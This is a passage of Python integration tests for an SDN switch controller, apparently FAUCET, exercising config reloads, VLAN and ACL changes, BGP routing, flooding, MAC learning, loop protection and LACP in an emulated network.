CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 200
"""
def test_port_down_flow_gone(self):
last_host = self.hosts_name_ordered()[-1]
self.require_host_learned(last_host)
second_host_dst_match = {'eth_dst': last_host.MAC()}
self.wait_until_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
self.change_port_config(
self.port_map['port_4'], None, None,
restart=True, cold_start=None)
self.wait_until_no_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
class FaucetConfigReloadTest(FaucetConfigReloadTestBase):
def test_add_unknown_dp(self):
conf = self._get_faucet_conf()
conf['dps']['unknown'] = {
'dp_id': int(self.rand_dpid()),
'hardware': 'Open vSwitch',
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_tabs_are_bad(self):
self._enable_event_log()
self.ping_all_when_learned()
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
good_config_hash_info = event['CONFIG_CHANGE']['config_hash_info']
self.assertNotEqual('', good_config_hash_info['hashes'])
orig_conf = self._get_faucet_conf()
self.force_faucet_reload(
'\t'.join(('tabs', 'are', 'bad')))
self.assertEqual(1, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: not event['CONFIG_CHANGE']['success'])
self.assertEqual('', event['CONFIG_CHANGE']['config_hash_info']['hashes'])
self.ping_all_when_learned()
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
self.assertEqual(good_config_hash_info, event['CONFIG_CHANGE']['config_hash_info'])
def test_port_change_vlan(self):
first_host, second_host = self.hosts_name_ordered()[:2]
third_host, fourth_host = self.hosts_name_ordered()[2:]
self.ping_all_when_learned()
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.one_ipv4_ping(first_host, second_host.IP(), require_host_learned=False)
# hosts 1 and 2 now in VLAN 200, so they shouldn't see floods for 3 and 4.
self.verify_vlan_flood_limited(
third_host, fourth_host, first_host)
def test_port_change_acl(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
orig_conf = self._get_faucet_conf()
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE, cookie=self.ACL_COOKIE)
self.wait_until_matching_flow(
{'vlan_vid': 100}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, host_cache=100)
self.verify_tp_dst_notblocked(
5001, first_host, second_host, table_id=None)
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=None)
def test_port_change_perm_learn(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
self.change_port_config(
self.port_map['port_1'], 'permanent_learn', True,
restart=True, cold_start=False)
self.ping_all_when_learned(hard_timeout=0)
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.retry_net_ping(hosts=(first_host, second_host))
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
restart=True, cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetDeleteConfigReloadTest(FaucetConfigReloadTestBase):
def test_delete_interface(self):
# With all ports changed, we should cold start.
conf = self._get_faucet_conf()
del conf['dps'][self.DP_NAME]['interfaces']
conf['dps'][self.DP_NAME]['interfaces'] = {
int(self.port_map['port_1']): {
'native_vlan': 100,
'tagged_vlans': [200],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetRouterConfigReloadTest(FaucetConfigReloadTestBase):
def test_router_config_reload(self):
conf = self._get_faucet_conf()
conf['routers'] = {
'router-1': {
'vlans': [100, 200],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetConfigReloadAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acls_in: [allow]
%(port_2)d:
native_vlan: 100
acl_in: allow
%(port_3)d:
native_vlan: 100
acl_in: deny
%(port_4)d:
native_vlan: 100
acl_in: deny
"""
def _verify_hosts_learned(self, hosts):
self.ping_all()
for host in hosts:
self.require_host_learned(host)
self.assertEqual(len(hosts), self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
def test_port_acls(self):
hup = not self.STAT_RELOAD
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self._verify_hosts_learned((first_host, second_host))
self.change_port_config(
self.port_map['port_3'], 'acl_in', 'allow',
restart=True, cold_start=False, hup=hup)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [3, 4, 'allow'],
restart=True, cold_start=False, hup=hup)
self.coldstart_conf(hup=hup)
self._verify_hosts_learned((first_host, second_host, third_host))
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.verify_tp_dst_blocked(5003, first_host, second_host)
class FaucetConfigReloadMACFlushTest(FaucetConfigReloadTestBase):
def test_port_change_vlan(self):
self.ping_all_when_learned()
self.assertEqual(4, len(self.scrape_prometheus(var='learned_l2_port')))
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.assertEqual(0, len(self.scrape_prometheus(var='learned_l2_port')))
class FaucetConfigReloadEmptyAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
300:
description: "untagged"
acls_in: [1]
"""
STAT_RELOAD = '1'
def test_port_acls(self):
hup = not self.STAT_RELOAD
self.change_port_config(
self.port_map['port_3'], 'acls_in', [],
restart=True, cold_start=False, hup=hup, change_expected=False)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [],
restart=True, cold_start=False, hup=hup, change_expected=False)
class FaucetConfigStatReloadAclTest(FaucetConfigReloadAclTest):
# Use the stat-based reload method.
STAT_RELOAD = '1'
class FaucetUntaggedBGPDualstackDefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24", "fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
for _ in range(2):
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4DefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import from BGP."""
NUM_FAUCET_CONTROLLERS = 1
NUM_GAUGE_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: 10.99.99.0/24
ip_gw: 10.0.0.1
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 10.0.1.0/24 next-hop 10.0.0.1 local-preference 100;
route 10.0.2.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.3.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.4.0/24 next-hop 10.0.0.254;
route 10.0.5.0/24 next-hop 10.10.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
# wait until 10.0.0.1 has been resolved
self.wait_for_route_as_flow(
first_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'))
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+10.0.4.0\/24.+cannot be us$')
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.0.3.0/24'))
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and export to BGP."""
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(mininet_test_util.LOCALHOST)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes sent."""
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
# exabgp should have received our BGP updates
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'10.0.0.0/24 next-hop 10.0.0.254',
'10.0.1.0/24 next-hop 10.0.0.1',
'10.0.2.0/24 next-hop 10.0.0.2',
'10.0.3.0/24 next-hop 10.0.0.2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
# test nexthop expired when port goes down
first_host = self.hosts_name_ordered()[0]
match, table = self.match_table(ipaddress.IPv4Network('10.0.0.1/32'))
ofmsg = None
for _ in range(5):
self.one_ipv4_controller_ping(first_host)
ofmsg = self.get_matching_flow(match, table_id=table)
if ofmsg:
break
time.sleep(1)
self.assertTrue(ofmsg, msg=match)
self.set_port_down(self.port_map['port_1'])
for _ in range(5):
if not self.get_matching_flow(match, table_id=table):
return
time.sleep(1)
self.fail('host route %s still present' % match)
class FaucetUntaggedRestBcastIPv4RouteTest(FaucetUntaggedIPv4RouteTest):
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetUntaggedVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all_when_learned()
self.assertTrue(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# VLAN level config to disable flooding takes precedence,
# cannot enable port-only flooding.
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedHostMoveTest(FaucetUntaggedTest):
def test_untagged(self):
self._enable_event_log()
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(2):
self.retry_net_ping(hosts=(first_host, second_host))
self.ping((first_host, second_host))
for host, in_port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.require_host_learned(host, in_port=in_port)
self.swap_host_macs(first_host, second_host)
for port in (self.port_map['port_1'], self.port_map['port_2']):
self.wait_until_matching_lines_from_file(
r'.+L2_LEARN.+"previous_port_no": %u.+' % port, self.event_log)
class FaucetUntaggedHostPermanentLearnTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
permanent_learn: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.ping_all_when_learned(hard_timeout=0)
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
# 3rd host impersonates 1st but 1st host still OK
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
self.assertFalse(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_3']))
self.retry_net_ping(hosts=(first_host, second_host))
# 3rd host stops impersonating, now everything fine again.
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
class FaucetCoprocessorTest(FaucetUntaggedTest):
N_UNTAGGED = 3
N_TAGGED = 1
CONFIG = """
interfaces:
%(port_1)d:
coprocessor: {strategy: vlan_vid}
mirror: %(port_4)d
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Inject packet into pipeline using coprocessor.
coprocessor_host, first_host, second_host, _ = self.hosts_name_ordered()
self.one_ipv4_ping(first_host, second_host.IP())
tcpdump_filter = ' and '.join((
'ether dst %s' % first_host.MAC(),
'ether src %s' % coprocessor_host.MAC(),
'icmp'))
cmds = [
lambda: coprocessor_host.cmd(
'arp -s %s %s' % (first_host.IP(), first_host.MAC())),
lambda: coprocessor_host.cmd(
'fping %s -c3 %s' % (self.FPING_ARGS_SHORT, first_host.IP())),
]
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, cmds, timeout=5, vflags='-vv', packets=1)
self.assertFalse(self.tcpdump_rx_packets(tcpdump_txt, packets=0))
class FaucetUntaggedLoopTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
loop_protect: True
%(port_4)d:
native_vlan: 100
loop_protect: True
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def total_port_bans(self):
total_bans = 0
for i in range(self.LINKS_PER_HOST * self.N_UNTAGGED):
port_labels = self.port_labels(self.port_map['port_%u' % (i + 1)])
total_bans += self.scrape_prometheus_var(
'port_learn_bans', port_labels, dpid=True, default=0)
return total_bans
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()
# Normal learning works
self.one_ipv4_ping(first_host, second_host.IP())
start_bans = self.total_port_bans()
# Create a loop between interfaces on second host - a veth pair,
# with two bridges, each connecting one leg of the pair to a host
# interface.
self.quiet_commands(second_host, (
'ip link add name veth-loop1 type veth peer name veth-loop2',
'ip link set veth-loop1 up',
'ip link set veth-loop2 up',
# TODO: tune for loop mitigation performance.
'tc qdisc add dev veth-loop1 root tbf rate 1000kbps latency 10ms burst 1000',
'tc qdisc add dev veth-loop2 root tbf rate 1000kbps latency 10ms burst 1000',
# Connect one leg of veth pair to first host interface.
'brctl addbr br-loop1',
'brctl setfd br-loop1 0',
'ip link set br-loop1 up',
'brctl addif br-loop1 veth-loop1',
'brctl addif br-loop1 %s-eth0' % second_host.name,
# Connect other leg of veth pair.
'brctl addbr br-loop2',
'brctl setfd br-loop2 0',
'ip link set br-loop2 up',
'brctl addif br-loop2 veth-loop2',
'brctl addif br-loop2 %s-eth1' % second_host.name))
# Flood some traffic into the loop
for _ in range(3):
first_host.cmd('fping %s -c3 10.0.0.254' % self.FPING_ARGS_SHORT)
end_bans = self.total_port_bans()
if end_bans > start_bans:
return
time.sleep(1)
self.assertGreater(end_bans, start_bans)
# Break the loop, and learning should work again
self.quiet_commands(second_host, (
'ip link set veth-loop1 down',
'ip link set veth-loop2 down',))
self.one_ipv4_ping(first_host, second_host.IP())
class FaucetUntaggedIPv4LACPTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
lacp_timeout: 3
interfaces:
%(port_1)d:
native_vlan: 100
lacp: 1
lacp_port_priority: 1
lacp_port_id: 100
%(port_2)d:
native_vlan: 100
lacp: 1
lacp_port_priority: 2
lacp_port_id: 101
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
def get_lacp_port_id(port):
port_labels = self.port_labels(port)
lacp_port_id = self.scrape_prometheus_var('lacp_port_id', port_labels, default=0)
return lacp_port_id
bond = 'bond0'
# Linux driver should have this state (0x3f/63)
#
# Actor State: 0x3f, LACP Activity, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...1 = LACP Activity: Active
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGSA]
# FAUCET should have this state (0x3e/62)
# Actor State: 0x3e, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...0 = LACP Activity: Passive
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGS*]
lag_ports = (1, 2)
synced_state_txt = r"""
Slave Interface: \S+-eth0
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 1
port number: %d
port state: 62
Slave Interface: \S+-eth1
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 2
port number: %d
port state: 62
""".strip() % tuple(get_lacp_port_id(self.port_map['port_%u' % i]) for i in lag_ports)
lacp_timeout = 5
def prom_lacp_up_ports():
lacp_up_ports = 0
for lacp_port in lag_ports:
port_labels = self.port_labels(self.port_map['port_%u' % lacp_port])
lacp_state = self.scrape_prometheus_var('port_lacp_state', port_labels, default=0)
lacp_up_ports += 1 if lacp_state == 3 else 0
return lacp_up_ports
def require_lag_up_ports(expected_up_ports):
for _ in range(lacp_timeout * 10):
if prom_lacp_up_ports() == expected_up_ports:
break
time.sleep(1)
self.assertEqual(prom_lacp_up_ports(), expected_up_ports)
def require_linux_bond_up():
for _retries in range(lacp_timeout * 2):
result = first_host.cmd('cat /proc/net/bonding/%s|sed "s/[ \t]*$//g"' % bond)
result = '\n'.join([line.rstrip() for line in result.splitlines()])
with open(os.path.join(self.tmpdir, 'bonding-state.txt'), 'w', encoding='utf-8') as state_file:
state_file.write(result)
if re.search(synced_state_txt, result):
break
time.sleep(1)
self.assertTrue(
re.search(synced_state_txt, result),
msg='LACP did not synchronize: %s\n\nexpected:\n\n%s' % (
result, synced_state_txt))
# Start with ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
# Deconfigure bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member))
# Configure bond interface
self.quiet_commands(first_host, (
('ip link add %s address 0e:00:00:00:00:99 '
'type bond mode 802.3ad lacp_rate fast miimon 100') % bond,
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond))
# Add bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set dev %s master %s' % (bond_member, bond),))
for _flaps in range(2):
# All ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
# Pick a random port to come up.
up_port = random.choice(lag_ports)
self.set_port_up(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
# We have connectivity with only one port.
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
# We have connectivity with two ports.
require_lag_up_ports(2)
require_linux_bond_up()
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
# We have connectivity if that random port goes down.
self.set_port_down(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
